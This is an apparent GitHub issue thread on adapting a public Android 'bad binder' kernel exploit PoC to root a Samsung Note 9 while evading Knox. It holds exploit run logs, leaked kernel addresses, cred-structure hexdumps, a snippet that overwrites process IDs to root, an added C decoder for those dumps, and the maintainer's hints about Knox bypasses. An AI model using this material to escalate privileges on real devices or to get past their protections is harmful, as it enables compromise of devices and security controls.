Samsung Note 9 (SM-N9600) poc
Hi @chompie1337, thank you for such great work. It's pretty useful to obtain root privileges without tripping KNOX.
I want to adapt your PoC for the Samsung Note 9 (SM-N9600) to modify my build.prop. Device details:
Android version: 8.1.0
Kernel version: 4.9.65-14505206 (gcc version 4.9.x 20150123 (prerelease) (GCC)) Tue Jan 8 16:29:04 KST 2019
Android security patch level: January 1, 2019
Baseband version: N9600ZCU1ARL3
Build number: N9600ZHU1ASA5
I'm not very familiar with the Android kernel, so I'm wondering how you found DECISION_AVC_CACHE_OFFSET? It seems that I found every offset except this one. (There is no N9600ZHU1ASA5 version on opensource.samsung.com, so I took N9600ZHU1ARL1 from https://github.com/klabit87/twrp_android_kernel_samsung_crownqltechn.)
At this point, my phone reboots while s8_poc is running:
crownqltechn:/sdcard/USER/cve $ cp s8_poc /data/local/tmp/s8_poc
crownqltechn:/sdcard/USER/cve $ cd /data/local/tmp
crownqltechn:/data/local/tmp $ chmod +x s8_poc
crownqltechn:/data/local/tmp $ ./s8_poc -s
[+] options are set, we're ready to go :)
[!] attempting to exploit bad binder...
leak_kernel_memory, i = 0
...
usleep(CHILD_SLEEP);
epoll_ctl(iEpFd, EPOLL_CTL_DEL, iBinderFd, &epoll_ev); WITH ARGUMENTS iEpFd=4, EPOLL_CTL_DEL=2, iBinderFd=3, &epoll_ev
I would be glad if you could find some time to help.
I got the following result with https://github.com/magicxor/qu1ckr00t/blob/0ed56c759a6e5877c5ec82c096553e8e4e778104/native/poc.c:
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffc10b75ad00
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffc160bf5e40
current->mm->user_ns == 0xffffff800a65eeb8
kernel base is 0xffffff80083bc000
&init_task == 0xffffff800a653380
init_task.cred == 0xffffff80094ec010
init->cred
00000000 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00 |....?.......?...|
00000040 ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00 |....?...........|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 e0 c0 4e 09 80 ff ff ff |..........N.....|
00000080 48 ee 65 0a 80 ff ff ff b8 ee 65 0a 80 ff ff ff |H.e.......e.....|
00000090 b8 06 66 0a 80 ff ff ff 00 00 00 00 00 00 00 00 |..f.............|
000000a0 00 00 00 00 00 00 00 00 b0 06 66 0a 80 ff ff ff |..........f.....|
000000b0 80 33 65 0a 80 ff ff ff 00 00 00 00 00 00 00 00 |.3e.............|
000000c0 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
current->cred == 0xffffffc01ffdb500
Starting as uid 2000
current->cred
00000000 01 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00 |................|
00000010 d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00 |................|
00000020 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 00 00 00 00 77 5b 68 c1 ff ff ff |.........w[h....|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 c0 56 a4 1f c0 ff ff ff |.........V......|
00000080 00 6e fc d4 c0 ff ff ff b8 ee 65 0a 80 ff ff ff |.n........e.....|
00000090 00 17 5a 68 c1 ff ff ff 00 00 00 00 00 00 00 00 |..Zh............|
000000a0 00 00 00 00 00 00 00 00 70 93 6b 68 c1 ff ff ff |........p.kh....|
000000b0 00 ad 75 0b c1 ff ff ff 00 a0 06 20 c0 ff ff ff |..u........ ....|
000000c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000000 00 02 00 00 00 00 00 00 fe ff ff ff ff ff ff ff |................|
00000010 00 00 00 00 00 00 00 00 17 12 f0 b3 b4 af da c8 |................|
init->security_cred
00000000 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 10 c0 4e 09 80 ff ff ff |..........N.....|
current->security_cred
00000000 92 04 00 00 92 04 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 b5 fd 1f c0 ff ff ff |................|
Escalating...
Then my phone rebooted.
Kernel R/W works:
crownqltechn:/ $ uname -a
Linux localhost 4.9.65-14505206 EXPLOITED KERNEL aarch64
But the phone reboots every time I try to overwrite my IDs:
// change IDs to root (there are eight)
for (int i = 0; i < 8; i++)
kernel_write_uint(my_cred+4 + i*4, 0);
or
kernel_write_ulong(pSecurityCapableListHead, pSecurityCapableListHead)
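Added example, not code from this issue, from chompie1337's PoC or from qu1ckr00t: a small C decoder that reads the two `struct cred` hexdumps pasted above (init->cred and current->cred) into named fields, so the offsets an ID-overwrite loop targets can be checked against the leaked bytes before anything is written back into the kernel. The byte arrays INIT_CRED and CUR_CRED are constructed from the dumps in this issue; the OFF_* offsets assume the upstream Linux 4.9 arm64 `struct cred` layout (usage at 0x00, uid..fsgid at 0x04..0x20, securebits at 0x24, five kernel_cap_t sets at 0x28..0x48, user_ns at 0x88), CAP_FULL_SET assumes CAP_LAST_CAP == 37, and the name OFF_RKP_BP_TASK for the pointer at 0xb0 is an assumption about Samsung's RKP cred extension, not an upstream field. `id_loop_touches_only_ids` replays the eight-iteration write loop from the snippet above on a userland copy of the dump.

```c
/* Added example (not from this issue or the PoCs it discusses): decode the
 * init->cred and current->cred dumps pasted in the issue into named fields.
 * Layout assumed: upstream Linux 4.9 arm64 `struct cred`; the 0xb0 pointer is
 * read by assumption as Samsung's RKP task back-pointer (not upstream). */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CRED_DUMP_LEN 0xd0
#define CAP_FULL_SET  0x3fffffffffULL   /* (1 << 38) - 1, CAP_LAST_CAP == 37 on 4.9 */

enum { OFF_USAGE = 0x00, OFF_IDS = 0x04, OFF_SECUREBITS = 0x24,
       OFF_CAP_INHERITABLE = 0x28, OFF_CAP_PERMITTED = 0x30,
       OFF_CAP_EFFECTIVE = 0x38, OFF_CAP_BSET = 0x40, OFF_CAP_AMBIENT = 0x48,
       OFF_USER_NS = 0x88, OFF_RKP_BP_TASK = 0xb0 /* assumption */ };

/* Constructed inputs: bytes transcribed from the init->cred and current->cred
 * dumps in the issue; offsets not listed are zero in the dumps. */
static const uint8_t INIT_CRED[CRED_DUMP_LEN] = {
    [0x00] = 0x04,                                   /* usage */
    [0x30] = 0xff, 0xff, 0xff, 0xff, 0x3f,           /* cap_permitted */
    [0x38] = 0xff, 0xff, 0xff, 0xff, 0x3f,           /* cap_effective */
    [0x40] = 0xff, 0xff, 0xff, 0xff, 0x3f,           /* cap_bset */
    [0x78] = 0xe0, 0xc0, 0x4e, 0x09, 0x80, 0xff, 0xff, 0xff,
    [0x80] = 0x48, 0xee, 0x65, 0x0a, 0x80, 0xff, 0xff, 0xff,
    [0x88] = 0xb8, 0xee, 0x65, 0x0a, 0x80, 0xff, 0xff, 0xff, /* init_user_ns */
    [0x90] = 0xb8, 0x06, 0x66, 0x0a, 0x80, 0xff, 0xff, 0xff,
    [0xa8] = 0xb0, 0x06, 0x66, 0x0a, 0x80, 0xff, 0xff, 0xff,
    [0xb0] = 0x80, 0x33, 0x65, 0x0a, 0x80, 0xff, 0xff, 0xff, /* == &init_task */
    [0xc8] = 0x01,
};
static const uint8_t CUR_CRED[CRED_DUMP_LEN] = {
    [0x00] = 0x01,                                   /* usage */
    [0x04] = 0xd0, 0x07, 0, 0, 0xd0, 0x07, 0, 0, 0xd0, 0x07, 0, 0, 0xd0, 0x07, 0, 0,
             0xd0, 0x07, 0, 0, 0xd0, 0x07, 0, 0, 0xd0, 0x07, 0, 0, 0xd0, 0x07, 0, 0,
    [0x40] = 0xc0,                                   /* cap_bset: CAP_SETGID|CAP_SETUID */
    [0x58] = 0x00, 0x77, 0x5b, 0x68, 0xc1, 0xff, 0xff, 0xff,
    [0x78] = 0xc0, 0x56, 0xa4, 0x1f, 0xc0, 0xff, 0xff, 0xff,
    [0x80] = 0x00, 0x6e, 0xfc, 0xd4, 0xc0, 0xff, 0xff, 0xff,
    [0x88] = 0xb8, 0xee, 0x65, 0x0a, 0x80, 0xff, 0xff, 0xff, /* same init_user_ns */
    [0x90] = 0x00, 0x17, 0x5a, 0x68, 0xc1, 0xff, 0xff, 0xff,
    [0xa8] = 0x70, 0x93, 0x6b, 0x68, 0xc1, 0xff, 0xff, 0xff,
    [0xb0] = 0x00, 0xad, 0x75, 0x0b, 0xc1, 0xff, 0xff, 0xff, /* == current_ptr */
    [0xb8] = 0x00, 0xa0, 0x06, 0x20, 0xc0, 0xff, 0xff, 0xff,
    [0xc0] = 0x06,
};

/* Little-endian readers: the dumps come from an arm64 (LE) kernel. */
static uint32_t rd32(const uint8_t *d, size_t off) {
    return (uint32_t)d[off] | (uint32_t)d[off + 1] << 8 |
           (uint32_t)d[off + 2] << 16 | (uint32_t)d[off + 3] << 24;
}
static uint64_t rd64(const uint8_t *d, size_t off) {
    return (uint64_t)rd32(d, off) | (uint64_t)rd32(d, off + 4) << 32;
}

/* i in 0..7: uid, gid, suid, sgid, euid, egid, fsuid, fsgid */
uint32_t cred_id(const uint8_t *d, int i)     { return rd32(d, OFF_IDS + 4 * (size_t)i); }
uint64_t cred_cap_effective(const uint8_t *d) { return rd64(d, OFF_CAP_EFFECTIVE); }
uint64_t cred_cap_bset(const uint8_t *d)      { return rd64(d, OFF_CAP_BSET); }
uint64_t cred_user_ns(const uint8_t *d)       { return rd64(d, OFF_USER_NS); }
uint64_t cred_rkp_bp_task(const uint8_t *d)   { return rd64(d, OFF_RKP_BP_TASK); }

/* Root in the usual sense: all eight IDs are 0 and the effective set is full. */
int cred_is_root(const uint8_t *d) {
    for (int i = 0; i < 8; i++)
        if (cred_id(d, i) != 0) return 0;
    return cred_cap_effective(d) == CAP_FULL_SET;
}

/* Replays the issue's loop (kernel_write_uint(my_cred+4 + i*4, 0), i = 0..7)
 * on a userland copy and confirms it zeroes exactly bytes 0x04..0x23 and
 * leaves every other byte alone, i.e. the loop's footprint matches the ID
 * fields of this layout. */
int id_loop_touches_only_ids(const uint8_t *d) {
    uint8_t copy[CRED_DUMP_LEN];
    memcpy(copy, d, sizeof copy);
    for (int i = 0; i < 8; i++)
        memset(copy + OFF_IDS + 4 * i, 0, 4);
    for (size_t off = 0; off < CRED_DUMP_LEN; off++) {
        int in_ids = off >= OFF_IDS && off < OFF_IDS + 32;
        if (in_ids ? copy[off] != 0 : copy[off] != d[off]) return 0;
    }
    return 1;
}

int main(void) {
    printf("current: uid=%u euid=%u cap_bset=%#llx root=%d\n",
           cred_id(CUR_CRED, 0), cred_id(CUR_CRED, 4),
           (unsigned long long)cred_cap_bset(CUR_CRED), cred_is_root(CUR_CRED));
    printf("init:    uid=%u cap_effective=%#llx root=%d\n",
           cred_id(INIT_CRED, 0), (unsigned long long)cred_cap_effective(INIT_CRED),
           cred_is_root(INIT_CRED));
    printf("user_ns equal: %d  bp_task(current)=%#llx\n",
           cred_user_ns(CUR_CRED) == cred_user_ns(INIT_CRED),
           (unsigned long long)cred_rkp_bp_task(CUR_CRED));
    return 0;
}
```

Build with `cc -std=c99 -Wall cred_dump.c`. Two things the decode makes visible: the uid..fsgid fields of current->cred all read 2000 (matching "Starting as uid 2000") and init->cred's permitted/effective/bounding sets read 0x3fffffffff, which is the sanity check that the assumed layout fits these dumps; and the 0xb0 slot holds the printed current_ptr in current->cred and &init_task in init->cred, consistent with the RKP back-pointer assumption. Since the loop's footprint lands exactly on the ID fields, a reboot on the real write is not explained by wrong offsets.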
Hi, the reason your phone reboots with the qu1ckr00t PoC is that the cred structures are protected by Samsung Knox, so they can't simply be overwritten. Hence the need for the special bypasses in this PoC.

The bad binder exploitation method changes slightly depending on the offset of the wait_head structure modulo 16 (ending in 0x0 or 0x8). At some point I will release a version of this PoC that is compatible with the S8 Exynos. The Oreo firmwares for the S8 Exynos have the offset that requires the other type of bad binder exploitation. If you want, you can simply replace the method for obtaining R/W from qu1ckr00t into this PoC.